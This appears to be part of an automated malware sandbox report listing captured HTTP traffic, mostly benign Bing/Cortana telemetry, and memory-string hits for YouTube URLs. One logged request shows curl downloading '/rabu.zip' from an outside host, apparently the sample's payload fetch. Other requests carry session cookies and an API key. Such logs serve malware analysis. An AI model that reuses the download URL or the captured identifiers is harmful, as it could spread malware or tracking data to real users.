Source: global traffic	HTTP traffic detected: GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /rp/Cm-j2OJKwOWyiyy_LY0s7IvC7Qc.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Tue, 26 Nov 2024 22:00:20 GMTif-none-match: 0x8DD0E65B838AF8Acookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/Cup3Is1bdaUS3C5__G12HeKRFUk.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/EZWKAkzgKyOdhH1NT8zm80mcnH4.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/F-9phXC_0uAqQQFuRafyV39z6Dk.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Tue, 11 Feb 2025 05:03:53 GMTif-none-match: 0x8DD4A597B271F69cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/FBodW3lwNP5Qe6iF-d8dpJdC9lc.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Thu, 10 Oct 2024 00:29:28 GMTif-none-match: 0x8DCE8C299FB56ADcookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/HblQIM5IGEhN4CVPKMIjlJHqY14.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/KS4jq8YC9OOOXT_rC7gR0M_1aN8.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/Kw-hqxyqLK6odmI-5H3LHnGRNUU.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /apc/trans.gif?87976b596980857850532fa909f51f1b HTTP/1.1host: b-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /rp/MYX7X3OSympejx7iZ4u3Rl1TwRA.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /apc/trans.gif?98758aa62564c1822353726be6083611 HTTP/1.1host: b-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /rp/RGSO4sEmvYv8wsttX4XoQuFoMMM.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/VrAE8CZ_PJkn0hgh2rwA1uThjyE.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Thu, 10 Oct 2024 00:31:38 GMTif-none-match: 0x8DCE8C2E76B0D4Dcookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /apc/trans.gif?62429672578152eea57f84aafc162f64 HTTP/1.1host: spo-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /rp/XKZ41694P7XbcLcfFJwPjCvgy20.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Thu, 10 Oct 2024 00:30:29 GMTif-none-match: 0x8DCE8C2BE5C5222cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /apc/trans.gif?456f89d19c3134a687f24503b7eb5933 HTTP/1.1host: spo-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /rp/ZnCCscMEmiOFOpkhdhTnOY5dhSY.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /r.gif?MonitorID=asgw&rid=f90d9d78e1ee958148fa709861896dba&w3c=true&prot=https:&v=20190506&DATA=[{%22RequestID%22:%22b-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:668,%22T%22:1},{%22RequestID%22:%22b-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:130,%22T%22:1},{%22RequestID%22:%22spo-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:661,%22T%22:1},{%22RequestID%22:%22spo-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:129,%22T%22:1},{%22RequestID%22:%22t-ring-fdv2.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:-1,%22T%22:1}] HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /rp/bdzEveHhW1Yhm9BKZUNXT_TlOPk.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/h2m6AVCpDtS8Ff3ZxuDGx1A2-O8.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Thu, 10 Oct 2024 00:33:02 GMTif-none-match: 0x8DCE8C319B7C9BFcookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/ikpPfkLjP14eKCzM16ksiFVp92Y.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Thu, 10 Oct 2024 00:32:27 GMTif-none-match: 0x8DCE8C3047DE767cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/lyORKltpug50ELqZ5ptEKcTB5EQ.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rabu.zip??56cfb29adde612865acb HTTP/1.1Host: www.stlchicago.comUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1host: www.google.comx-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: NID=524=XQ8vO7qgDY4xZCkZKIhi0FxhO55QtBLxj9sncjQzjvGtkq2ctgvOkBEr7js2tfxiGwyhzXutM7TTtZ1gHYSaOr_ptYNJD3PF9enrgoA0nh7uvKFGXGqrHWwG3ZrsND9Y_eil2DFr6TbANtaSoH_1ig89fqmYO5cy1QuPnXzwMKUXuVr4UUTDRGZFADFHmHeNI-nYFVQpriority: u=4, i

Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: .www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: .www.youtube.com_KEY equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3390319725.00007424004D2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3269307697.0000742402162000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3350009991.000074240118D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: =https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3390319725.00007424004D2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3269307697.0000742402162000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3350009991.000074240118D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: =https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3390319725.00007424004D2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3269307697.0000742402162000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3350009991.000074240118D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: =https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3188767621.0000742400896000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2420969918.00007424015CF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: >6https://www.youtube.com/youtubei/v1/log_event?alt=json equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: E=https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX( ( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3188767621.0000742400896000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2420969918.00007424015CF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: E=https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: E=https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws( ( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: E=https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2907199839.00007424011D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: E=https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR( ( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2297972034.0000742401714000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: _keyhttps://www.youtube.com/s/player/3b4b7883/www-embed-player.vflset/www-embed-player.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2420598347.0000742401C63000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1856136210.0000742401B77000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.1856136210.0000742401B77000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/cspreport equals www.youtube.com (Youtube)
